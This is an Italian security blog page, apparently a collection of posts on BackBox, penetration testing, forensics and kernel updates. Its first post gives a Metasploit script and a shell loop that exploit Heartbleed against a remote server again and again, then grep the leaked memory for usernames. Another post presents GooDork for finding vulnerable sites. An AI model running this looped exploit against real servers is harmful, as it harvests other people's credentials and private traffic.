Metasploit & Heartbleed – Rendere ricorsivo l’exploit

Heartbleed

Heartbleed è un’importante vulnerabilità del popolare software OpenSSL, CVE-2014-0160, il bug consente di leggere fino a 64KB di memoria dal server vulnerabile, con la possibilità di compromettere le chiavi segrete utilizzate per identificare i fornitori dei servizi e per crittografare il traffico, i nomi e le password degli utenti.

Metasploit include un modulo per verificare se un server è vulnerabile o meno, se è vulnerabile permette allora di estrarre la chiave privata RSA e il data leak di 64KB. Se vogliamo lavorare sul data leak per intercettare le richieste GET generate con il protocollo HTTPS dovremmo rendere ricorsivo l’attacco, funzione purtroppo non implementata da Metasploit. Conseguentemente dovremmo ripetere manualmente il comando run ogni qualvolta vogliamo estrarre il traffico dal server vulnerabile.

Per rendere automatica l’estrazione della memoria, ripetendo il comando ogni X secondi mi sono creato un semplice script da eseguire tramite il nostro terminale. Questo ci permetterebbe di estrarre il Data Leak del server in maniera ricorsiva per tutto il tempo che riteniamo necessario.

Metasploit & Heartbleed – Rendere ricorsivo l’exploit

heartbleed.rc

Il primo passaggio da effettuare è quello di creare con il vostro editor di testo preferito il file heartbleed.rc ed editarlo come segue:


use auxiliary/scanner/ssl/openssl_heartbleed
spool /home/Scrivania/heartbleed_script/output_metasploit.txt
set RHOSTS XXX.YYY.ZZZ.JJJ
set verbose true
run

exit

 

Dovrete personalizzare questo script inserendo la corretta destinazione di spool, ovvero dove Metasploit genererà il file di log con il Data Leak e l’indirizzo IP del host remoto. Infine vi ricordo che tra i comandi run ed exit deve esserci un a capo.

Ciclo While

Il passaggio successivo è quello di lanciare Metasploit richiamando il precedente Run Commands ogni XX secondi, useremo un semplicissimo ciclo while da lanciare sul nostro terminale:

while true; do sudo msfconsole -r heartbleed.rc; sleep XX; done

Andando a sostituire XX con i secondi necessari alla ripetizione dell’exploit, ponderate questo valore in base al traffico del server e anche alla velocità della vostra linea.

Grep

Avviando lo script inizierà a generarsi il file di log output_metasploit.txt, precedentemente specificato, dopo diverse ore/giorni di esecuzione risulterà molto difficile leggere il file di log vi consiglio quindi di sfruttare grep per estrarre le porzioni di log che possono interessarvi, ecco un semplice esempio per estrarre ogni porzione di memoria contenente la parola username:

grep -oiE “.{0,20}.username.{0,20}” output_metasploit.txt | uniq

Il comando Grep vi estrarrà dal log tutte e porzioni di memoria contenete la parola username mostrandovi anche i precedenti e successivi 20 caratteri il tutto in No Case Sentitive. Infine ho aggiunto il comando uniq per semplificare l’output evitando doppioni.

BackBox 4 – Installing in the Virtual Machine and Preview

BackBox 4 - Installing in the Virtual Machine and Preview

Stamattina in diretta dall’HackInBo vi ho annunciato il rilascio della quarta versione di BackBox, ora in una videoguida voglio farvi vedere come installare BackBox in una macchina virtuale sfruttando VMWare Fusion o Workstation, l’interfaccia del nuovo menu di BackBox e il rinnovato Script Anonymous!

Buona Visione…

[AGGIORNATO] Hacklog – Video Guide dell’Hacking

Hacklog

Stefano Novelli di Invorge.Tv mi ha recentemente contattato per chiedermi di collaborare al suo recente progetto di Hacklog, per motivi di tempo non riuscirò ad aiutarlo ma più che volentieri pubblicizzo questa ottima iniziativa! Hacklog è un video portale su YouTube dedicato alla Sicurezza Informatica dove vengono pubblicate delle Esaustive Guide in Italiano sui principali strumenti che ogni IT Security deve conoscere! Ogni video ha un proprio livello di difficoltà riepilogato tramite il colore dei teschietti, il verde rappresenta una difficoltà minima mentre il rosso la massima difficoltà!

Per chi vuole seguire il progetto può collegarsi al sito internet ufficiale, di seguito riporterò i video ad oggi presenti sul portale così potete immediatamente guardavi qualche guida 😉

Continua a leggere

[GUIDA] Aggiorniamo BackBox

backbox_2_logo

Una domanda comune che ci viene proposta quando viene rilasciata una nuova versione di BackBox è come eseguire l’aggiornamento della versione attualmente installata, ho quindi pensato di realizzare una breve guida con le indicazioni principali per aiutarvi al meglio.

Major Update

(Es. da BackBox 2 a BackBox 3.0)

Non è possibile eseguire l’aggiornamento diretto ad una versione maggiore in quanto le novità introdotte sono notevoli (Migrazione ad un nuovo Kernel, Nuova versione di ubuntu, ecc ecc) e pertanto vi consigliamo di effettuare un backup dei vostri documenti personali e di procedere ad una installazione pulita della nuova versione di BackBox. Ricordatevi che il rilascio di un Major Update prevede l’abbandono del supporto delle versioni precedenti.

Mirror Update

(Es. da BackBox 3.01 a BackBox 3.05)

È possibile effettuare l’aggiornamento eseguendo da terminale i seguenti comandi:

$ sudo apt-get update && sudo apt-get upgrade

È consigliato attraverso il precedente comando aggiornare le dipendenze della vostra attuale versione per evitare eventuali conflitti futuri.


$ sudo apt-get dist-upgrade

Il comando precedente vi permette di eseguire l’avanzamento di versione.


$ sudo apt-get install backbox-desktop –reinstall

Quest’ultimo comando invece vi permette di aggiornare il set di strumenti contenuti in BackBox.

Al termine dei comandi è consigliato un riavvio, al termine potrete verificare la versione versione di BackBox con il seguente comando:

$ more /etc/issue

[VIDEOGUIDA] Knock Subdomain Scan

Knock

Con grande stupore noto solo ora di non avervi mai parlato di Knock, chiedo venia. Knock un software sviluppato in Python da Gianni Amato progettato per enumerare i sottodomini di un dominio attraverso una wordlist e di bypassare le Wildcard. Il software è incluso anche nella distribuzione BackBox di Penetration Testing e voglio proporvi una video guida realizzata da SecurityTube dove potrete apprendere al meglio il funzionamento di questo software.

Vi ricordo infine che potete scaricare Knock su sito internet ufficiale, dopo il salto vi attende la video guida!

Continua a leggere

,

Simulazione di un Penetration Test

network_security

Sommario

Viene presentata la simulazione di un attacco informatico, Penetration Testing, un metodo di valutare la sicurezza di un sistema o di una rete.
L’analisi viene condotta dalla posizione di un potenziale aggressore il quale attraverso più fasi individuerà una o più debolezze, tali vulnerabilità potranno essere sfruttare per compromettere il funzionamento del sistema.
Il Penetration Testing ha pertanto lo scopo di individuare vulnerabilità informatiche, rilevando il maggior numero di dettagli sulla vulnerabilità che permettono un accesso non autorizzato.

Abstract

Presents the simulation of a cyber attack, Penetration Testing, a method of evaluating the safety of a system or network.
The analysis is carried out from the position of a potential attacker, through multiple stages will identify one or more weaknesses, such vulnerability may be exploited to compromise the operation of the system.
The Penetration Testing therefore the aim of identifying computer vulnerabilities, noting many details on the vulnerabilities that allow unauthorized access.

Introduzione

La corsa agli armamenti è in atto, è quanto sostiene McAfee in un recente report, ma non per guerre materiali ma per attacchi informatici. La Sicurezza Informatica è ormai una priorità di tutti gli stati addirittura in alcuni casi maggiore della difesa missilistica, pertanto affronteremo in questo articolo una simulazione di un Penetration Test partendo dalle prime fasi di un attacco fino a fornire esempi pratici sulla metodologia applicata e i tools utilizzati.

L’attenzione verso la Sicurezza Informatica è cresciuta negli ultimi anni proporzionalmente alla diffusione di sistemi informatici e all’incremento della collettività nell’utilizzo dei PC. L’Hacker Etico è oggi una figura ricercata ed importante per grandi aziende o stati al fine di rilevare e sconfiggere eventuali minacce derivanti da attacchi informatici.

L’obbiettivo di un sistema protetto è di garantire l’accesso e l’integrità all’informazione ai soli utenti che ne hanno facoltà, impedendo l’accesso abusivo da parte di estranei o evitando l’alterazione delle informazioni in esso contenute.

Il Penetration Test è dunque il processo operativo in grado di valutare la sicurezza di un sistema o di una rete simulando l’attacco di un utente malintenzionato, il fine è l’ottenimento di informazioni protette o il controllo completo del sistema remoto sfruttando le proprie competenze, aiutandosi anche con software automatici. Auditor è colui che svolge tutte le attività di verifica operando con logiche medesime a quelle di un Hacker.

L’analisi intrapresa da un Auditor comprende più fasi ed ha l’obiettivo di evidenziare in un report le debolezze rilevate nella piattaforma, fornendo il maggior numero di informazioni sulle vulnerabilità sfruttate per ottenere l’accesso non autorizzato. Tutti i problemi rilevati vengono quindi presentati fornendo una stima chiara sull’attuale capacità di difesa e del livello di penetrazione raggiunto nei confronti delle vulnerabilità del sistema interne ed esterne ed eventualmente delle vulnerabilità fisiche.

L’Auditor non si fermerà ad analizzare i soli sistemi informatici ma potrà sfruttare tecniche di Ingegneria Sociale per verificare eventuali carenze formative del personale aziendale di fronte a tentativi di intrusione; questa modalità definita Hidden Mode prevede l’accordo esclusivamente con il consiglio amministrativo dell’azienda che commissiona le verifiche lasciando all’oscuro tutto il personale, compreso il settore IT dell’azienda.

Continua a leggere

[GUIDA] Indicizziamo i contenuti di una immagine forense con KS e Caine

KS & Caine

Continuiamo a pubblicare le interessantissime video guide girate da Nanni Bassetti sulla Digital Forensics, nel video che trovate dopo il salto impareremo ad usare il software KS, come estrarre da un dispositivo a blocchi o da un’immagine bit a bit (raw) i file ed indicizzarli su database, per effettuare più ricerche per keywords. Il tutto grazie all’utilizzo della distribuzione Caine reperibile sul sito internet ufficiale.

Continua a leggere

,

GooDork – Linea di Comando per le Google Dorks

GooDork è uno script scritto in Python progettato per ricercare delle Dorks mediante Google sfruttando la comodità della linea di comando del vostro sistema operativo. Attraverso le Dorks di Google è possibile ricercare siti internet vulnerabili, documenti o file riservati.

Il software è facilmente scaricabile attraverso il comando GID:

$ sudo git clone https://github.com/k3170makan/GooDork

Sono però necessarie diverse dipendenze Python per poterlo far funzionare:

Un particolare punto di attenzione per  il pacchetto Beautiful Soup una volta scaricato e scompattato da linea di comando per installarlo digitate:

$ sudo easy_install beautifulsoup4

Infine per avviare GooDork basterà digitare:

$ sudo python GooDork.py [dork]

Il software permette inoltre di personalizzare la ricerca attraverso delle espressioni regolari con l’intento di ricercare la Dork nel testo visibile, nel titolo della pagina, in alcuni domini, ecc ecc.

Via | DarkNet

[How-To-Video] Install Nessus 5 on BackBox

A poche ore dall’articolo sul rilascio di Nessus 5 vi proponiamo una breve video guida per l’installazione del famoso software di Security Scanning sulla distribuzione di Pent Testing BackBox.

Per qualsiasi chiarimento non esitate ad usare i commenti…

[VIDEO] BackBox – How to Install Linux Kernel 3.x

In questo video vedremo come aggiornare il Kernel della nostro distribuzione BackBox all’ultima versione 3, la procedura è veramente molto semplice ma si sconsiglia l’installazione su un sistema in produzione.

Prima di iniziare è consigliato disinstallare i driver o i moduli legati al vecchio Kernel ed in particolar modo i driver nVidia e quelli legati alle schede Wireless. Nel video vi ho riportato un esempio su come disinstallare i driver nVidia attraverso i seguenti comandi

$ sudo apt-get purge nvidia-current
$ sudo apt-get autoremove –purge

Ora collegatevi al sito di Ubuntu per scaricare l’ultima release del Kernel 3: http://kernel.ubuntu.com/~kernel-ppa/mainline/ prestate molta attenzione a scaricare i pacchetti riguardanti la vostra architettura (i386 o amd64) più il pacchetto deb generale come qui riportato:

Pacchetto Generale

$ mkdir kernel
$ cd kernel
$ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-headers-3.2.1-030201_3.2.1-030201.201201121644_all.deb

amd64

$ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-headers-3.2.1-030201-generic_3.2.1-030201.201201121644_amd64.deb
$ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-image-3.2.1-030201-generic_3.2.1-030201.201201121644_amd64.deb

i386

$ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-headers-3.2.1-030201-generic_3.2.1-030201.201201121644_i386.deb
$ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-image-3.2.1-030201-generic_3.2.1-030201.201201121644_i386.deb

i386 pae

$ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-headers-3.2.1-030201-generic-pae_3.2.1-030201.201201121644_i386.deb
$ wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.2.1-precise/linux-image-3.2.1-030201-generic-pae_3.2.1-030201.201201121644_i386.deb

Infine installiamo i pacchetti attraverso Debian package management system:

$ sudo dpkg -i *.deb

Riavviamo il sistema e verifichiamo attraverso il seguente comando il buon esito dell’installazione:

$ uname -r

Fonte | Raffaele Forte